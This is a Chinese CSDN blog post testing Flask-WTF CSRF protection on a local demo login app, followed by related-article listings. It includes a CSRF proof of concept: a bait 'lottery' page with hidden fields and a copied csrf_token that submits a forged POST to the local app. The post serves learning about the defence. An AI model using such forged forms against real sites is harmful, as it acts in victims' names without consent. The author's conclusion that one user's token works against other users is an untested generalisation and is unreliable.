csrf攻击与防护—4初探flask-wtf的csrf防护机制和攻击

于 2021-12-16 22:48:42 发布
阅读量159 收藏
点赞数
分类专栏: python3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acbc12345/article/details/121943934
版权

CSRF攻击 Flask应用 WTF验证 DataRequired 防御措施
关键词由CSDN通过智能技术生成

一切看官网为准!

import os
from flask import Flask
from flask import render_template

from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired

app = Flask("xx")
app.config["SECRET_KEY"] = os.urandom(24)


class NameForm(FlaskForm):
    name = StringField('What is your name?', validators=[DataRequired()])


@app.route("/log", methods=["GET", "POST"])
def log_in():
    form = NameForm()
    # validate_on_submit会帮你验是否是post方法以及验证表单
    if form.validate_on_submit():
        return "<h1>success</h1>"
    # 经过validate_on_submit后,form.errors会被填充进错误信息,可以根据这个记录被攻击信息
    if form.errors:
        print("We got an attack! {0}".format(form.errors))
        # 攻击者发送的post表单提交请求无效
        # 可记录请求者信息做进一步处理
        # 这里也可不做下面的处理我们将离开攻击者页面跳转到正常的登录操作页面
        # return "<h1>access denied!</h1>"
    return render_template("log_in.html", form=form)


if __name__ == "__main__":
    app.run(port="8089")

log_in.html

<form method="POST" action="/log">
    {{ form.csrf_token }}
    {{ form.name.label }} {{ form.name(size=20) }}
    <input type="submit" value="Go">
</form>

=========================================================

攻击者代码
from flask import render_template, Flask, request, jsonify

app = Flask("haha")


@app.route("/")
def root():
    return render_template("page_attack.html")


if __name__ == "__main__":
    app.run(port=8083)

page_attack.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>main</title>
</head>
<body>
<h1>抽大奖!</h1>
<form method="POST" action="http://127.0.0.1:8089/log">
    <!-- 先以正常用户登录获取csrf_token,然后把下面csrf_token的value替换,竟然也可以攻击成功!
    也就是说,获取一个正常用户的csrf_token然后写到攻击页面,就可以攻击其它用户了!
    这也太扯了!而app.config["SECRET_KEY"]是全局变量,这个如果定时动态地去改变,
    用户就要不停的登录验证,体验感就会变得很差!要想个办法!
    -->
    <input id="csrf_token" name="csrf_token" type="hidden" value="Ijg3YzI3OTZmOTc2MmY1ZDA1ZWExZDM4Yzg5M2M4ODgyMjg1NDAyNzgi.YbtM7w.CTeZ0rPpLd5N2QUy1DCItMx7dWo">
    <label type="hidden" for="name">What is your name?</label>
    <input type="hidden" id="name" name="name" required="" size="20" type="text" value="ffsdf">
    <input type="submit" value="点我抽大奖">
</form>

</body>
</html>

也就是说上面对还是能够破解的,需要更加完善的解决方案!

Dan.Qiao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask模拟实现CSRF攻击的方法
12-24
CSRF CSRF全拼为Cross Site Request Forgery,译为跨站请求伪造。 CSRF攻击者盗用了你的身份,以你的名义发送恶意请求。 包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…… 造成的问题:个人隐私泄露以及财产安全。 CSRF攻击示意图 客户端访问服务器时没有同服务器做安全验证 防止 CSRF 1.在客户端向后端请求界面数据的时候,后端会往响应中的 cookie 中设置 csrf_token 的值 2.在 Form 表单中添加一个隐藏的的字段,值也是 csrf_token 3.在用户点击提交的时候,会带上这两个值向后台发起请求
Flask-WTF表单的使用方法
09-19
Flask-WTF 是一个针对 Flask 框架设计的表单处理库,它基于 WTForms,并为 Flask 提供了额外的功能,例如 CSRF 保护等。Flask-WTF 的主要用途在于简化表单创建过程中的代码量,并提供强大的表单验证功能。 #### 二...
初窥CSRF攻击方式以及Flask-WTF
楼上小宇_home
10-28 309
含义 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 解释 这幅图非常形象的解释了CSRF原理的具体过程。 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤: 登录受信任网站A,并在本地生成Cookie。 在不登出A的情况下,访问危险...
flask设置和取消csrf
qq_39112101的博客
08-09 3283
flask-wtf模块携带csrf校验,使用的时候需要开启,csrf的引入和实例化如下 在flask当中,flask-wtf模块携带csrf校验的,需要开启。在项目的起始位置开启CSRFProtect,然后对整个app保护。 表单中设置csrf 前端使用csrf_token,属于teacher_form表单的可以独立使用,不受上面开启的影响 。 csrf的取消:@csrf...
WTF 与代码
zhanghaiyang9999的专栏
08-09 2471
WTF (what the fuck)跟代码有什么关系? 当别人阅读你写的代码的时候,如果能够看得很舒服,而不是不停的WTF,说明你的代码写得很好! 毕竟很多时候代码是给人看的,只有在编译的时候才是给机器看的。所以,把代码写好了,写简洁清晰了,别人看你的代码的时候WTF就少了!:)  ...
CSRF防御之token认证
热门推荐
EmotionComputer
06-24 3万+
一、CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造。攻击者盗用你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全。 二、CSRF攻击原理 三、防御CSRF的策略:token认证 1、token验证方法 CSRF 攻击之...
PyPI 官网下载 | Flask-WTF-0.10.0.tar.gz
01-11
3. **CSRF保护**:为了防止跨站请求伪造(Cross-Site Request Forgery, CSRF攻击,`Flask-WTF`内置了CSRF令牌支持。 4. **文件上传**:支持用户通过表单进行文件上传,提供方便的文件处理接口。 5. **重置密码功能...
flask-wtf:FlaskWTForms的简单集成,包括CSRF,文件上传和Recaptcha集成
05-05
Flask-WTF是基于PythonFlask微框架和WTForms库的一个扩展,它为开发者提供了一种方便的方式来处理表单验证、防止跨站请求伪造(CSRF攻击,以及集成谷歌的reCAPTCHA服务,以验证用户是否为机器人。下面我们将深入...
使用PythonFlask框架表单插件Flask-WTF实现Web登录验证
09-21
为了防止这种攻击Flask-WTF提供了内置的CSRF保护机制。它通过生成一个唯一的CSRF令牌,并将其存储在用户的会话(cookies)中。当用户提交表单时,服务器会检查令牌的有效性,确保提交的请求来源于合法的页面。这样...
flask入门教程(19) - 安全注意事项
pynickle的博客
08-25 741
安全注意事项 网站是容易被攻击的,所以我们要做好准备,我们主要介绍两种方式: XSS(跨站脚本攻击) 跨站脚本攻击是指在一个网站的环境中注入恶任意的HTML和js。为了防止这一攻击,我们要转义HTML。 在 Flask 中,除非显式指明不转义, Jinja2 会自动转义所有值。这样可以排除所 有模板导致的 XSS 问题,但是其它地方仍需小心: 不使用 Jinja2 生成 HTML 。 在用户提交...
Flask项目实现防止CSRF攻击的流程
是什么让你停止不前?
10-12 1329
Flask项目实现防止CSRF攻击的流程 a) 使用 flask_wtfCSRFProtect类,初始化该类并传入app b) 使用 flask_wtf.csrf模块中的generate_csrf方法生成csrf_token c) 使用请求勾子 after_request,取到响应,统一设置到cookie中 d) 如果前端使用form表单提交,需要在表单中添加隐藏的input,并设置其va...
Flask-WTF 之防止CSRF***学习记录
weixin_33910137的博客
12-22 291
CSRF 保护这部分文档介绍了 CSRF 保护。为什么需要 CSRFFlask-WTF 表单保护你免受 CSRF 威胁,你不需要有任何担心。尽管如此,如果你有不包含表单的视图,那么它们仍需要保护。例如,由 AJAX 发送的 POST 请求,然而它背后并没有表单。在 Flask-WTF 0.9.0 以前的版本你无法获得 CSRF 令牌。这是为什么我们要实现 CSRF。实现为了...
Flask使用Flask-WTF表单
小马同学
03-24 2757
Flask-WTF Flask-WTFFlask框架的表单验证模块,Flask-WTF将表单数据解析、CSRF保护、文件上传等功能与Flask集成。 安装 Flask-WTF及其依赖可使用pip安装 pip install flask-wtf 安装成功如下: 跨站请求伪造保护 默认请求下,Flask-WTF能保护所有表单免受跨站请求伪造(CSRF)的攻击。为了实现CSRF保护,Flask-WTF需要程序设置一个密钥。Flask-WTF使用这个密钥生成加密令牌,再用令牌验证请求中表单数据的真伪。设置密钥
Flask 项目中解决csrf攻击
yutu75的博客
11-22 830
首先装个库吧,命令如下: pip install flask_wtfFlask 中, Flask-wtf 扩展有一套完善的 csrf 防护体系,对于我们开发者来说,使用起来非常简单 设置应用程序的 secret_key,用于加密生成的 csrf_token 的值 # 1. session加密的时候已经配置过了.如果没有在配置项中设置,则如下: app.secret_key = "#此处可以写随机字符串#" # 2. 也可以写在配置类中。 class Config(object): DE
pythonflask解决xss攻击漏洞
石磊
12-22 4763
版权声明:可以任意转载,转载时请标明文章原始出处-xjtushilei和作者信息:石磊 xss漏洞解决跨站脚本攻击的原理XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。跨站脚本攻击的危害:窃取c
Python pip 更换国内下载源--更快!!
ACBC12345的博客
03-11 4439
Python pip 更换国内下载源–更快!! 默认国外下载源,慢的要炸!!还老是出现超时错误!! 必须要换下载源!! 国内下载源推荐: 豆瓣:http://pypi.douban.com/simple/ 中科大:https://pypi.mirrors.ustc.edu.cn/simple/ 清华:https://pypi.tuna.tsinghua.edu.cn/simple 指定下载源使...
python setup.py bdist_wheel 报错的处理办法
ACBC12345的博客
09-16 4398
usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...] or: setup.py --help [cmd1 cmd2 ...] or: setup.py --help-commands or: setup.py cmd --help error: invalid command 'bdist_w...
flaskflask-WTF的区别
最新发布
06-19
FlaskFlask-WTF 是两个 Python Web 开发框架,它们各自服务于不同的目的: 1. Flask: Flask 是一个轻量级的 web 框架,它专注于提供基础的 web 应用程序结构,如路由、请求和响应处理等。它本身不包含任何表单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值